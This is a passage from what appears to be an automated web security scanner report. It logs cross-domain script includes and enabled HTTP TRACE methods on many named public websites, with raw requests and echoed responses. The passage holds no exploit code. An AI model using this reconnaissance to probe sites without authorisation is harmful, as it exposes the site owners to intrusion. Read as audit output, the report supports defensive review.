User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usa.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:06:11 GMT
Content-Length: 19734
Connection: close

<!DOCTYPE html>

           <html lang="en" xml:lang="en">
   
<head>
    <title>USA.gov Website: Error Page</title>

   <meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
           <meta name="
...[SNIP]...
<link rel="accessibility" href="/About/Important_Notices.shtml#a11y" />
       
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...
20.42. http://www.usajobs.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usajobs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10861
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSCBQRCBB=MGJGMMNCLOGHNJBKECBCECPF; path=/
Date: Sat, 02 Apr 2011 13:35:33 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US" dir="ltr">
<head>
<title>USAJOBS - Page Not Found</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<!-- foreseeresults poll scripts -->
<script type="text/javascript" src="http://media.newjobs.com/id/mgs/2192/cc/foresee/browse/foresee-trigger.js"></script>
...[SNIP]...
</script>
<script src="http://media.newjobs.com/js/wt/dcsi4u0zt00000g4ea6le2s1o_8k6u.js" type="text/javascript"></script>
...[SNIP]...
20.43. http://www.videobash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta prop
...[SNIP]...
</title>    
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
20.44. http://www.websitealive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
20.45. http://www.wellness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:48 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Content-Length: 50558
Content-Type: text/html
Cache-Control: private
Set-Cookie: WWFLV=LV=2011%2D4%2D2+6%3A33%3A48; expires=Mon, 02-Apr-2012 13:33:48 GMT; path=/
Set-Cookie: ASPSESSIONIDACQCTCRD=BJAKHBHDIHGAFFDGECCKGLMB; path=/
X-Cache: MISS from squid1.earnware.corp
X-Cache-Lookup: MISS from squid1.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid1.earnware.corp (squid)
Connection: close

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>The pursuit of health and happiness - 404 Not Foun
...[SNIP]...
<input type="submit" class="greenbutton pad" value="Search" border="0" onClick="document.getElementById('q').value = document.getElementById('q_base').value"><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007762231624042944498:1bib2y4plko"></script>
...[SNIP]...
<div class="leftcolumn">
                           <script type="text/javascript" src="http://c0669102.cdn.cloudfiles.rackspacecloud.com/tabcontent.js">
           /***********************************************
           * Tab Content script v2.2- . Dynamic Drive DHTML code library (www.dynamicdrive.com)
           * This notice MUST stay intact for legal use
           * Vis
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<input type="submit" value="Search" name="sa" alt="" border="0" class="greenbutton" />
                   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007762231624042944498:1bib2y4plko"></script>
...[SNIP]...
</div>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
20.46. http://www.whitepages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...
</p>


<script src="http://js.revsci.net/gateway/gw.js?csid=A06546" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://pixel.quantserve.com/api/segments.json?a=p-13CZptiqAcX_w&amp;callback=whitepages.vendor.quantast_demographics_callback" type="text/javascript"></script>
...[SNIP]...
20.47. http://www.xbox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xbox.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xbox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:20 GMT
Content-Length: 11729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><!--
v 11.3.0051.2
s NnGQg20QFW+VgUopOqzJAQ==
r e3406941-9803-47dc-bab7-3163d61e31e5
-->
<script type="text/javascript" src="http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
20.48. http://www.yallwire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yallwire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Set-Cookie: USERID=-1; expires=Fri, 23-Mar-2012 13:40:51 GMT; path=/; domain=.yallwire.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 15649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type='text/javascript' src='http://www2.music-tags.com/tagengine/www/delivery/spcjs.php?id=30'></script>
...[SNIP]...
<div class="ad_728" id="ad_728_2" style="display:none"><script src="http://view.atdmt.com/AST/jview/171337918/direct;vt.1/01?buster_url=&pub_view_url=&click=" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
21. TRACE method is enabled  previous  next
There are 278 instances of this issue:

21.1. http://smp.adviva.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /

Request

TRACE / HTTP/1.0
Host: smp.adviva.net
Cookie: 9aabfc172e1eba65

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:09 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: smp.adviva.net
Cookie: 9aabfc172e1eba65

21.2. http://www.110mb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.110mb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.110mb.com
Cookie: be8821eef3864b20

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:15 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.110mb.com
Cookie: be8821eef3864b20

21.3. http://www.123greetings.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.123greetings.com
Cookie: cb1a7551a7cb1c7b

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:33:21 GMT
Content-Type: message/http
Content-Length: 184
Expires: Sat, 02 Apr 2011 13:33:21 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.123greetings.com
Cookie: cb1a7551a7cb1c7b
X-Forwarded-For: 173.193.214.243
_FP_X_URL: http://www.123greetings.com/
Accept-Encoding: identity;q=0.001

21.4. http://www.2wire.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2wire.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2wire.net
Cookie: eff44b07532193e8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:23:38 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: TwoWireLB=3234149130.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.2wire.net
Cookie: eff44b07532193e8

21.5. http://www.4chan.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4chan.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4chan.org
Cookie: ee4fe4d5a12621b1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:11 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4chan.org
Cookie: ee4fe4d5a12621b1

21.6. http://www.about.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.about.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.about.com
Cookie: c612f15f0c06cab6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
CIPA: 173.193.214.243
Connection: Keep-Alive
Cookie: c612f15f0c06cab6
Host: www.about.com

21.7. http://www.aceshowbiz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aceshowbiz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aceshowbiz.com
Cookie: c562985f537f5958

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aceshowbiz.com
Cookie: c562985f537f5958

21.8. http://www.ad4game.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ad4game.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ad4game.com
Cookie: 50d7464d27ea5cb2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ad4game.com
Cookie: 50d7464d27ea5cb2

21.9. http://www.adfunky.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfunky.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.adfunky.com
Cookie: 9803b409bae59d19

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adfunky.com
Cookie: 9803b409bae59d19

21.10. http://www.adriver.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /

Request

TRACE / HTTP/1.0
Host: www.adriver.ru
Cookie: f23cdfb932761613

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adriver.ru
Cookie: f23cdfb932761613

21.11. http://www.allbusiness.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allbusiness.com
Cookie: 72e420995d859a15

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allbusiness.com
Cookie: 72e420995d859a15
X-Forwarded-For: 173.193.214.243

21.12. http://www.allmenus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allmenus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allmenus.com
Cookie: 31e5ac33e1bce26d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allmenus.com
Cookie: 31e5ac33e1bce26d

21.13. http://www.allvoices.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allvoices.com
Cookie: e5ff592639190a5d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allvoices.com
Cookie: e5ff592639190a5d

21.14. http://www.alphadictionary.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphadictionary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.alphadictionary.com
Cookie: 5a3c9df35d057f26

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.alphadictionary.com
Cookie: 5a3c9df35d057f26

21.15. http://www.amerisave.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amerisave.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.amerisave.com
Cookie: 74b02beb4eb7e82d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:35 GMT
Server: Apache/2.2.15 (Win64) mod_ssl/2.2.15 OpenSSL/0.9.8m JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.amerisave.com
Cookie: 74b02beb4eb7e82d
X-Forwarded-For: 173.193.214.243
Front-End-Https: OFF

21.16. http://www.andiesisle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andiesisle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.andiesisle.com
Cookie: 13f9715918ff72c4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 13f9715918ff72c4
Host: www.andiesisle.com

21.17. http://www.answerbag.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.answerbag.com
Cookie: d57457d4aff16ee0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:08 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.answerbag.com
Cookie: d57457d4aff16ee0

21.18. http://www.aolnews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: b2058eaf288ca47a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: b2058eaf288ca47a
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:25:52D2:200483,x-lb-client-ip:ajg_u

21.19. http://www.apartmenthomeliving.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apartmenthomeliving.com
Cookie: f579456d50d50e78

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Connection: close

TRACE /find HTTP/1.0
Host: www.apartmenthomeliving.com
Cookie: f579456d50d50e78
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.apartmenthomeliving.com
X-Forwarded-Server: www.apartmenthomeliving.com

21.20. http://www.apartmentratings.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apartmentratings.com
Cookie: 4b3f1dbf0683324c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:42 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

TRACE / HTTP/1.0
Host: www.apartmentratings.com
Cookie: 4b3f1dbf0683324c
Connection: Keep-Alive

21.21. http://www.apples4theteacher.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apples4theteacher.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apples4theteacher.com
Cookie: 85753ade9a6c8f4a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.apples4theteacher.com
Cookie: 85753ade9a6c8f4a

21.22. http://www.articlesbase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.articlesbase.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.articlesbase.com
Cookie: 123bbe8ea5326842

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:47 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.articlesbase.com
Cookie: 123bbe8ea5326842
X-Forwarded-For: 173.193.214.243

21.23. http://www.autotrader.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.autotrader.com
Cookie: 782192d1428e84d7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=A50336DC33AC2068; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerAT-Production_hhtp=360015370.61475.0000; path=/

TRACE / HTTP/1.0
Host: www.autotrader.com
Cookie: 782192d1428e84d7
atc_ssl: false

21.24. http://www.barackobama.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barackobama.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.barackobama.com
Cookie: d5eb7991e5d2f6e1

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:41:56 GMT
Content-Type: message/http
Content-Length: 113
Expires: Sat, 02 Apr 2011 13:41:56 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.barackobama.com
Cookie: d5eb7991e5d2f6e1
_FP_X_URL: http://www.barackobama.com/

21.25. http://www.beezid.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beezid.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.beezid.com
Cookie: c1dc27bddff39e69

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 124
Server: Apache
Date: Sat, 02 Apr 2011 14:02:48 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.beezid.com
Cookie: c1dc27bddff39e69
X-Varnish: 333756357
X-Forwarded-For: 173.193.214.243

21.26. http://www.bible.cc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bible.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bible.cc
Cookie: 6be7ef3a33fc4d32

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bible.cc
Cookie: 6be7ef3a33fc4d32

21.27. http://www.biglots.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biglots.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.biglots.com
Cookie: 88cca9fb01c07157

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.biglots.com
Cookie: 88cca9fb01c07157

21.28. http://www.blackberry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blackberry.com
Cookie: a5ac1bc713b44eb6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blackberry.com
Cookie: a5ac1bc713b44eb6

21.29. http://www.blackplanet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blackplanet.com
Cookie: efd7a1581a00b94

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blackplanet.com
Cookie: efd7a1581a00b94
Connection: Keep-Alive
Remote-Address: 173.193.214.243

21.30. http://www.blastro.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blastro.com
Cookie: a426e0305adabf4f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:24 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blastro.com
Cookie: a426e0305adabf4f

21.31. http://www.blogs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blogs.com
Cookie: a6ebee76ed4047d0

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blogs.com
Cookie: a6ebee76ed4047d0
X-Forwarded-For: 173.193.214.243, 10.17.141.102
Connection: keep-alive

21.32. http://www.bluemountain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bluemountain.com
Cookie: 2e93fe007038e44e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bluemountain.com
Cookie: 2e93fe007038e44e
X-Forwarded-For: 173.193.214.243

21.33. http://www.blurtit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blurtit.com
Cookie: 57028575ff2e8118

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blurtit.com
Cookie: 57028575ff2e8118

21.34. http://www.breitbart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.breitbart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.breitbart.com
Cookie: 1d6a575c65a8632b

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:12 GMT
